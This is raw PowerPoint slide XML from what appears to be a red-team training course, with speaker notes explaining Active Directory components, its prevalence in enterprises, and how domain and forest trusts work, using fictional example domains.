              <a:t>. Previously, Dave was a member of Citibank's Red Team, leading Adversary Emulations and Red Team engagements. After his time at Citibank, he was the Red Team Director for numerous well-respected consulting firms conducting Red Teaming, Purple Teaming, Adversary Emulations, and penetration testing. Dave holds a Bachelor of Science from SUNY- Plattsburgh and several certifications, including GIAC GSE, GSEC, GSNA, GCIA, GCFE, GPEN, GXPN, GCIH, GWAPT, GAWN, and OSCP.</a:t>
            </a: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48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71268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Active Directory is a technology developed by Microsoft and included in professional versions of Windows.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Microsoft describes it as: "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Active Directory enables centralized, secure management of an entire network, which might span a building, a city, or multiple locations throughout the world.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>It is by far the most commonly used enterprise directory service.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Its built-in enterprise management tools render it a dream for both sysadmins and adversaries. Contrary to popular belief, AD is not limited to only Windows systems!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Active Directory started out as a directory service for Windows domains but has grown beyond domain, user, and computer management.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>As a result, compromise of the Active Directory typically means a full compromise of the (majority of the) IT environment. The key Active Directory services we will focus on are security-related: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRP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Resources: Computers, Users, Shares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Security Policies and Central Management: Group Policy </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="17145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Access Rules that control relationships between resources: DACLs </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>References: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https://adsecurity.org/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https://attack.mitre.org/techniques/T1087/002/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https://attack.mitre.org/techniques/T1482/ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>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https://attack.mitre.org/techniques/T1069/002/ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="17145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https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc780036(v=ws.10)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="226752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According to Microsoft themselves, Active Directory is used by over 90% of fortune 1000 companies. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is unsurprising, as the majority of users are used to Windows and is therefore a low barrier choice. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On top of that, there are not a lot of suitable alternatives out there to manage very big networks centrally.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As chances are great that the majority of your red team operations will involve Active Directory one way or another, the understanding of this technology will be crucial to achieving your objectives.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Reference: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://download.microsoft.com/documents/uk/pcit/1-PCIT-Empowering%20People%20centric%20IT.pptx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Image reference:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.flaticon.com/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="112067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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In order </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>understand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Active Directory, we need to dissect the various components that are present.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Active Directory, at its core, is nothing more than a complex database containing anything in the network, including users, computers, groups, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Active Directory contains the following components:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Schema contains definitions of every object that can be created in AD.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As AD has to be able to manage big and complex networks, AD contains various optimization algorithms to perform indexing and querying objects.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The global catalog, which contains all information on Active Directory objects across a forest.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Finally, AD has replication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>services</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to make sure that all the managing nodes (Domain Controllers) have the most up-to-date data available to them. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Reference: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://docs.microsoft.com/en-us/Windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="313068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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Let's shift our focus to the overall Microsoft domain and forest trusts. Microsoft domains are based on the following core concepts:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="234950" indent="-171450" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trees are collections of related domains.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="234950" indent="-171450" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Forests are collections of trees that trust one another.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>According to Microsoft documentation, domains are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> considered security boundaries, but forests are.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trusts are used to allow authentication between multiple domains. By default, Microsoft creates the following trusts:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="234950" indent="-171450" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Parent-child trust (two-way, transitive) when a new domain is added in a tree</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="234950" indent="-171450" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tree-root trust (two-way, transitive) when a new tree is added in a forest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A variety of different trusts can be set up, depending on the specific use case. We will discuss trust types in more detail later.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25848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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The diagram on the slide provides an overview of what a typical domain/forest trust looks like:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We have a root domain, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Draconem.corp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, which has a child domain, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dev.draconem.corp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, in the same tree.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="2" indent="-171450">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There is a parent-child trust between </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Draconem.corp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dev.draconem.corp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We have another root domain, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Thunderbird.corp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="-171450" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There is a tree-root trust between </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Draconem.corp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Thunderbird.corp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once a trust is set up, the authentication flow is arranged. Permissions still need to be assigned, however! This is typically performed by adding remote users in local groups.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Default trusts are set up between root domains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Draconem.corp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Thunderbird.corp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (in the same forest). All of the trusts are two-way and transitive; hence, all domains trust one another in this setup.</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE"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9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1140726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 Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4189A381-0446-BB4C-A4E6-F4F04D8646BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="560101" y="6271949"/>
            <a:ext cx="9729788" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54000" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1200" b="0" cap="all" spc="150" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>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Enter copyright holder name  |  all rights reserved</a:t>
            </a:r>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E49EF5F3-DD50-4896-058C-958FB4F45229}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="560101" y="4747391"/>
            <a:ext cx="11592916"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F9B6446-8AEE-BDBF-51A0-DAC055B9F6AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="560101" y="1636713"/>
            <a:ext cx="11369629" cy="2955925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="5400" b="1">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="342900" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="5200">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="571500" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="5200">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="800100" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="5200">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="490050" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="5200">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to enter section title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
